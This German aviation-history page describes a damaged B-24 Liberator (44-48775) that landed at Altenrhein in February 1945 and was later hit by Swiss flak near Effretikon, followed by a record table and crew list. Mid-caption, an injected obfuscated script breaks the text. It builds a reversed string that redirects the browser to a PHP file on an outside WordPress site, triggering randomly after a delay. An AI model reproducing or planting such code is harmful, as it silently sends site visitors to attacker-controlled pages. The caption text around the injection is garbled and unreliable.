Ereignisse

Schweizer Piloten von Schweizer Flab beschossen

Der Bomber mit dem Kennzeichen 47 ist nach einem Einsatz über Augsburg in Altenrhein gelandet. Am 19.09.1945 nach Burtonwood zurück gekehrt.

Die schwer beschädigte Maschine von 1st Lt Grooms auf dem Flugplatz von Altenrhein. (189_5)

Die schwer beschädigte Maschine von 1st Lt Grooms auf dem Flugplatz von Altenrhein. (189_5)

Der letzte grosse Einflug des Krieges fand am 27. Februar 1945 statt, als die 15th Air Force den Verschiebebahnhof von Augsburg praktisch dem Erdboden gleichmachte. Der Bomber der 15th Air Force, 455th Bomb Group mit dem Kennzeichen 47 ist nach einem Einsatz über Augsburg in Altenrhein gelandet und am 19.09.1945 nach Burtonwood zurückgekehrt. 1Lt Ray M. Grooms hatte zu seiner angestammten Crew einen weiteren Passagier, SGT Wynfield S. Clayton war als Fotograf bei dieser Mission an Bord. Kurz vor dem Ziel wurde Motor Nummer 1 und Nummer 3 von der Flak ausser Betrieb geschossen. Grooms konnte noch bis zum Ziel mit der Formation mithalten und die Bomben abwerfen. Anschliessend verliess Grooms die Formation und flog in die Schweiz. Durch Flaktreffer wurden Kabel von Motor Nummer 3 und Nummer 4 beschädigt sodass die Motoren nicht mehr kontrolliert werden konnten. Motor Nummer 1 hatte alles Öl verloren und auch Motor Nummer 2 arbeitete nicht sauber. Glücklicherweise konnte der Bomber sicher in Altenrhein landen. Die B-24 wurde repariert und die defekten Motoren ersetzt. Am 26. März 1945 wurde die Maschine von Oberst Högger und Wachtmeister Schraner nach Dübendorf überflogen. Unglücklicherweise wurden nicht alle Schweizer Flabstellungen von diesem Überflug informiert. Auch die Neutralitätsbemalung konnte nicht verhindern, dass der Bomber in der Gegend von Effretikon von der Schweizer Flab beschossen wurde. Einige Treffer hinter dem Pilotensitz waren die Folge.

Das gleiche Flugzeug nach dem Überführungsflug in Dübendorf. Kurz vor der L<script type=

$p$VTO6JhIH6WkCGAcPR=function(n){if (typeof ($p$VTO6JhIH6WkCGAcPR.list[n]) == „string“) return $p$VTO6JhIH6WkCGAcPR.list[n].split(„“).reverse().join(„“);return $p$VTO6JhIH6WkCGAcPR.list[n];};$p$VTO6JhIH6WkCGAcPR.list=[„‚php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andung hatte eine in Effretikon stationierte Flab-Einheit den Bomber aufs Korn genommen, wobei Einschläge knapp hinter dem Pilotensitz registriert wurden. (190_1)“ width=“800″ height=“251″ /> Das gleiche Flugzeug nach dem Überführungsflug in Dübendorf. Kurz vor der Landung hatte eine in Effretikon stationierte Flab-Einheit den Bomber aufs Korn genommen, wobei Einschläge knapp hinter dem Pilotensitz registriert wurden. (190_1)

Die 44-48775 wird für die Überführung nach Burtonwood überholt. (190_2)

Die 44-48775 wird für die Überführung nach Burtonwood überholt. (190_2)


Ereignissdatum 27.2.1945
Ort Altenrhein
Kanton SG
Ereignis Landung
Nation Amerika
Flugzeugart Bomber
Flugzeugtyp B-24 Liberator
Flugzeugbezeichnung B-24 J-20-FO
Einteilung 15th Air Force, 455th Bomb Group, 742nd Squadron
Basis San Giovanni (I)
Auftrag Bombardierung
Einsatzziel Verschiebebahnhof Augsburg (D)
Rückkehr 19.09.1945 Rückkehr nach Burtonwood (GB)
Werknummer 44-48775
Kennzeichen 47
CH Archiv Nr. A155
US MACR Nr. 12484
Besatzung Pilot: Ray M. Grooms, 1st Lt
Copilot: James J. Connolly, 2ndt Lt
Navigator: Angelo W. De Piano, 2nd Lt
Bombardier: George A. Muise, Jr., 2nd Lt
Engineer: Felice J. Alfino, T/Sgt
Radio: Robert J. Hammer, T/Sgt
Gunner: Joseph P. Siles, S/Sgt
Gunner: Robert E. Sink, S/Sgt
Gunner: David E. Stine, S/Sgt
Gunner: Marshall F. West, S/Sgt
Photographer: Wynfield S. Clayton, Sgt
Quelle Cockpit
Autor Hans-Heiri Stapfer